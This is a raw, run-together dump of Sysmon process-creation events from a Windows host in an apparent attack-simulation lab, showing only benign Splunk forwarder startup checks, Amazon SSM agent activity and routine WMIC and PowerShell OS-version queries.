AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DFF-6078-3A00-00000000AE01}3656C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 154100x80000000000000002332Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:10.974{A8622C2F-3E02-6078-5A00-00000000AE01}3868C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get OperatingSystemSKU /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{A8622C2F-3DFF-6078-3A00-00000000AE01}3656C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 154100x80000000000000002319Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:10.963{A8622C2F-3E02-6078-5900-00000000AE01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E02-6078-5800-00000000AE01}3144C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list replication_port --no-log 154100x80000000000000002306Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:10.955{A8622C2F-3E02-6078-5800-00000000AE01}3144C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E02-6078-5700-00000000AE01}3744C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 154100x80000000000000002293Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:10.949{A8622C2F-3E02-6078-5700-00000000AE01}3744C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E00-6078-4C00-00000000AE01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000002271Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:10.598{A8622C2F-3E02-6078-5600-00000000AE01}2060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E00-6078-4C00-00000000AE01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000002255Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:10.551{A8622C2F-3E02-6078-5500-00000000AE01}4036C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_OperatingSystem" "| Select-Object" "Version, OperatingSystemSKU" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DFF-6078-3A00-00000000AE01}3656C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 154100x80000000000000002240Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:10.296{A8622C2F-3E02-6078-5400-00000000AE01}3220C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E02-6078-5300-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 154100x80000000000000002227Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:10.289{A8622C2F-3E02-6078-5300-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E00-6078-4C00-00000000AE01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000002191Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:09.995{A8622C2F-3E01-6078-5200-00000000AE01}3880C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E01-6078-5100-00000000AE01}3740C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 154100x80000000000000002177Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:09.988{A8622C2F-3E01-6078-5100-00000000AE01}3740C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E00-6078-4C00-00000000AE01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000002159Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:09.565{A8622C2F-3E01-6078-5000-00000000AE01}2984C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E01-6078-4F00-00000000AE01}3112C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 154100x80000000000000002146Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:09.558{A8622C2F-3E01-6078-4F00-00000000AE01}3112C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E00-6078-4C00-00000000AE01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000002129Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:09.252{A8622C2F-3E01-6078-4E00-00000000AE01}2680C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E00-6078-4C00-00000000AE01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000002111Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:08.970{A8622C2F-3E00-6078-4D00-00000000AE01}3596C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E00-6078-4C00-00000000AE01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000002098Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:08.956{A8622C2F-3E00-6078-4C00-00000000AE01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-3E00-6078-4B00-00000000AE01}3648C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 154100x80000000000000002085Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:08.950{A8622C2F-3E00-6078-4B00-00000000AE01}3648C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002070Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:08.875{A8622C2F-3E00-6078-4A00-00000000AE01}2104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'" "| Select-Object" "ProductName, BuildLabEx, CurrentMajorVersionNumber, CurrentMinorVersionNumber" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DFF-6078-3A00-00000000AE01}3656C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 154100x80000000000000002057Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:08.621{A8622C2F-3E00-6078-4900-00000000AE01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E00-6078-4800-00000000AE01}4036C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 154100x80000000000000002044Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:08.614{A8622C2F-3E00-6078-4800-00000000AE01}4036C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E00-6078-4700-00000000AE01}4024C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 154100x80000000000000002031Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:08.608{A8622C2F-3E00-6078-4700-00000000AE01}4024C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFF-6078-3D00-00000000AE01}3712C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 154100x80000000000000002014Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:08.543{A8622C2F-3E00-6078-4600-00000000AE01}3996C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get Version /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{A8622C2F-3DFF-6078-3A00-00000000AE01}3656C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 154100x80000000000000001997Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:07.907{A8622C2F-3DFF-6078-3A00-00000000AE01}3656C:\Program Files\Amazon\SSM\ssm-agent-worker.exe-----"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=532894851130E19A62E811A3C7E2B6A6,SHA256=950F8FCDD05F9DD8D1C9E4C9B6D7D18644F662683A1942BD70B1028FA595119C,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{A8622C2F-3DFE-6078-2A00-00000000AE01}2500C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" 154100x80000000000000001963Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:08.319{A8622C2F-3E00-6078-4400-00000000AE01}3864C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E00-6078-4300-00000000AE01}3844C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 154100x80000000000000001950Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:08.312{A8622C2F-3E00-6078-4300-00000000AE01}3844C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E00-6078-4200-00000000AE01}3832C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 154100x80000000000000001937Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:08.306{A8622C2F-3E00-6078-4200-00000000AE01}3832C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFF-6078-3D00-00000000AE01}3712C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 154100x80000000000000001855Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:07.973{A8622C2F-3DFF-6078-4000-00000000AE01}3764C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3DFF-6078-3F00-00000000AE01}3744C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 154100x80000000000000001851Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:07.964{A8622C2F-3DFF-6078-3F00-00000000AE01}3744C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3DFF-6078-3E00-00000000AE01}3732C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 154100x80000000000000001847Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:07.956{A8622C2F-3DFF-6078-3E00-00000000AE01}3732C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFF-6078-3D00-00000000AE01}3712C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 154100x80000000000000001843Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:07.942{A8622C2F-3DFF-6078-3D00-00000000AE01}3712C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-3DFF-6078-3C00-00000000AE01}3700C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 154100x80000000000000001839Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:07.936{A8622C2F-3DFF-6078-3C00-00000000AE01}3700C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000001831Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:07.886{A8622C2F-3DFF-6078-3900-00000000AE01}3636C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-3DFF-6078-3700-00000000AE01}3572C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 154100x80000000000000001682Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:07.552{A8622C2F-3DFF-6078-3700-00000000AE01}3572C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 